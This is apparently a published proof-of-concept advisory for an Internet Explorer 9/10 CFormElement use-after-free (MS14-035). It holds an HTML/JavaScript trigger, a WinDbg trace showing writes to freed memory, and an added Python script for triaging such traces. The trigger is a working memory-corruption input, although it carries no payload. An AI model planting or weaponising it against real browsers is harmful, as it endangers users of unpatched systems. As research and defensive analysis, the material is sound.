<!--
Exploit Title: MS14-035 Internet Explorer CFormElement Use-after-free and memory corruption POC (no crash! see trace)
Product: Internet Explorer
Vulnerable version: 9,10
Date: 8.07.2014
Exploit Author: Drozdova Liudmila, ITDefensor Vulnerability Research Team (http://itdefensor.ru/)
Vendor Homepage: http://www.microsoft.com/
Tested on: Windows 7 SP1 x86 IE 9,10
CVE : unknown
-->
<html>
<body>
<form id="form1">
<input id="input1" type="text" value="">
</form>
<script>
loaded = false;
function func() {
    if (loaded) {
        document.body.innerHTML = ""; // free CFormElement
    }
}
input1 = document.getElementById("input1");
input1.onclick = func;
loaded = true;
input1.click(); // Call DoClick function
</script>
</body>
</html>
<!--
Vulnerability details

MSHTML!CInput::DoClick
66943670 8bcf            mov     ecx,edi
66943672 ff751c          push    dword ptr [ebp+1Ch]
66943675 ff7518          push    dword ptr [ebp+18h]
66943678 ff7514          push    dword ptr [ebp+14h]
6694367b ff7510          push    dword ptr [ebp+10h]
6694367e ff750c          push    dword ptr [ebp+0Ch]
66943681 ff7508          push    dword ptr [ebp+8]                     <---- esi = CFormElement
66943684 e856e4f3ff      call    MSHTML!CElement::DoClick (66881adf)   <--- call of func() in javascript, free esi
66943689 85db            test    ebx,ebx
6694368b 7408            je      MSHTML!CInput::DoClick+0x74 (66943695)
6694368d 83666400        and     dword ptr [esi+64h],0  ds:0023:0034cd84=00000001 ; memory corruption, write to freed memory
66943691 836668fe        and     dword ptr [esi+68h],0FFFFFFFEh                   ; memory corruption, write to freed memory

MSHTML!CInput::DoClick+0x60:
66943681 ff7508          push    dword ptr [ebp+8]    ss:0023:023ec994=00000000
0:005> p
eax=00000001 ebx=00000001 ecx=00317540 edx=66943621 esi=0034cd20 edi=00317540
eip=66943684 esp=023ec95c ebp=023ec98c iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
MSHTML!CInput::DoClick+0x63:
66943684 e856e4f3ff      call    MSHTML!CElement::DoClick (66881adf)
0:005> dds esi l1
0034cd20  6661ead8 MSHTML!CFormElement::`vftable'
0:005> !heap -x esi          <-- esi contains valid pointer to CFormElement
Entry     User      Heap      Segment       Size  PrevSize  Unused    Flags
-----------------------------------------------------------------------------
0034cd18  0034cd20  00270000  002fcee8        78         -         c  LFH;busy
0:005> p
eax=00000000 ebx=00000001 ecx=00000000 edx=66408ac8 esi=0034cd20 edi=00317540
eip=66943689 esp=023ec978 ebp=023ec98c iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
MSHTML!CInput::DoClick+0x68:
66943689 85db            test    ebx,ebx
0:005> dds esi l1
0034cd20  6661005c MSHTML!CSVGPathSegCurvetoCubicAbs::`vftable'+0x12c
0:005> !heap -x esi          <-- esi contains freed pointer to CFormElement
Entry     User      Heap      Segment       Size  PrevSize  Unused    Flags
-----------------------------------------------------------------------------
0034cd18  0034cd20  00270000  002fcee8        78         -         0  LFH;free
0:005> p
eax=00000000 ebx=00000001 ecx=00000000 edx=66408ac8 esi=0034cd20 edi=00317540
eip=6694368b esp=023ec978 ebp=023ec98c iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
MSHTML!CInput::DoClick+0x6a:
6694368b 7408            je      MSHTML!CInput::DoClick+0x74 (66943695)          [br=0]
0:005> p
eax=00000000 ebx=00000001 ecx=00000000 edx=66408ac8 esi=0034cd20 edi=00317540
eip=6694368d esp=023ec978 ebp=023ec98c iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
MSHTML!CInput::DoClick+0x6c:
6694368d 83666400        and     dword ptr [esi+64h],0  ds:0023:0034cd84=00000001
-->
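The trace above makes the use-after-free visible by hand: `!heap -x esi` reports the block as busy before `CElement::DoClick` and free after it, the `dds` vftable symbol changes, and the next instruction still writes through `esi`. The following triage script is an added example, not part of the advisory or any Microsoft tooling; it replays a WinDbg session dump and reports those two observations automatically. It assumes the default x86 WinDbg layouts for register dumps, `dds` rows and `!heap -x` rows as they appear above; `Finding`, `analyze` and the `SAMPLE_TRACE` excerpt (addresses copied from the trace) are constructed for the example.

```python
"""Triage helper for WinDbg use-after-free traces (added example).

Replays register dumps, `dds` rows and `!heap -x` rows and reports
  1. a heap block that flips busy -> free while a register still holds it
  2. a later instruction that writes through that register
"""
import re
from dataclasses import dataclass

# Register dump: "eax=00000001 ... esi=0034cd20 ..."
REG_RE = re.compile(r"\b(eax|ebx|ecx|edx|esi|edi|ebp|esp|eip)=([0-9a-f]{8})")
HEAP_CMD_RE = re.compile(r"^\d+:\d+>\s*!heap -x (\w+)")
# !heap -x row: Entry User Heap Segment Size PrevSize Unused Flags
HEAP_ROW_RE = re.compile(
    r"^([0-9a-f]{8})\s+([0-9a-f]{8})\s+[0-9a-f]{8}\s+[0-9a-f]{8}\s+\S+\s+\S+\s+\S+\s+(\S+)$")
DDS_CMD_RE = re.compile(r"^\d+:\d+>\s*dds (\w+)")
DDS_ROW_RE = re.compile(r"^([0-9a-f]{8})\s+[0-9a-f]{8}\s+(\S+)")
# Disassembly line whose destination operand is memory addressed through a register
MEM_WRITE_RE = re.compile(
    r"^([0-9a-f]{8})\s+[0-9a-f]+\s+(and|or|xor|add|sub|mov|inc|dec)\s+"
    r"(?:dword|word|byte) ptr \[(e[a-z]{2})(?:[+-][0-9a-f]+h?)?\]")


@dataclass
class Finding:
    kind: str      # "freed-while-held" or "write-after-free"
    address: int   # heap user pointer involved
    detail: str


def analyze(trace: str) -> list:
    regs, flags, first_sym, last_sym = {}, {}, {}, {}
    pending = None            # ("heap"|"dds", address) waiting for its output row
    findings = []
    for line in (l.strip() for l in trace.splitlines()):
        for reg, val in REG_RE.findall(line):
            regs[reg] = int(val, 16)          # track the latest value of each register
        m = HEAP_CMD_RE.match(line)
        if m:
            pending = ("heap", regs.get(m.group(1)))
            continue
        m = DDS_CMD_RE.match(line)
        if m:
            pending = ("dds", regs.get(m.group(1)))
            continue
        if pending and pending[0] == "heap" and (m := HEAP_ROW_RE.match(line)):
            addr = int(m.group(2), 16)
            if addr == pending[1]:
                state = "free" if "free" in m.group(3).lower() else "busy"
                if flags.get(addr) == "busy" and state == "free":
                    findings.append(Finding("freed-while-held", addr,
                        f"vftable first {first_sym.get(addr)}, now {last_sym.get(addr)}"))
                flags[addr] = state
                pending = None
            continue
        if pending and pending[0] == "dds" and (m := DDS_ROW_RE.match(line)):
            addr = int(m.group(1), 16)
            if addr == pending[1]:
                first_sym.setdefault(addr, m.group(2))
                last_sym[addr] = m.group(2)
                pending = None
            continue
        m = MEM_WRITE_RE.match(line)
        if m and flags.get(regs.get(m.group(3))) == "free":
            findings.append(Finding("write-after-free", regs[m.group(3)],
                f"{m.group(2)} at {m.group(1)} via {m.group(3)}"))
    return findings


# Constructed excerpt modelled on the stepped trace in the advisory (addresses copied from it).
SAMPLE_TRACE = """\
eax=00000001 ebx=00000001 ecx=00317540 edx=66943621 esi=0034cd20 edi=00317540
eip=66943684 esp=023ec95c ebp=023ec98c iopl=0         nv up ei pl nz na po nc
66943684 e856e4f3ff      call    MSHTML!CElement::DoClick (66881adf)
0:005> dds esi l1
0034cd20  6661ead8 MSHTML!CFormElement::`vftable'
0:005> !heap -x esi
Entry     User      Heap      Segment       Size  PrevSize  Unused    Flags
-----------------------------------------------------------------------------
0034cd18  0034cd20  00270000  002fcee8        78         -         c  LFH;busy
0:005> p
eax=00000000 ebx=00000001 ecx=00000000 edx=66408ac8 esi=0034cd20 edi=00317540
eip=66943689 esp=023ec978 ebp=023ec98c iopl=0         nv up ei pl zr na pe nc
66943689 85db            test    ebx,ebx
0:005> dds esi l1
0034cd20  6661005c MSHTML!CSVGPathSegCurvetoCubicAbs::`vftable'+0x12c
0:005> !heap -x esi
Entry     User      Heap      Segment       Size  PrevSize  Unused    Flags
-----------------------------------------------------------------------------
0034cd18  0034cd20  00270000  002fcee8        78         -         0  LFH;free
0:005> p
eip=6694368d esp=023ec978 ebp=023ec98c iopl=0         nv up ei pl nz na po nc
6694368d 83666400        and     dword ptr [esi+64h],0  ds:0023:0034cd84=00000001
"""

if __name__ == "__main__":
    for f in analyze(SAMPLE_TRACE):
        print(f"{f.kind:18} {f.address:08x}  {f.detail}")
```

Run it on a saved WinDbg log after stepping over the suspect call with `p` and re-issuing `dds`/`!heap -x` on the held register; the first finding confirms the object was released during the call (the vftable symbol no longer names the original class), and the second pinpoints the instruction that touches the freed block, which is exactly the evidence to attach to a vendor report or to cross-check against a page-heap (`gflags /p`) run where the same write would fault immediately.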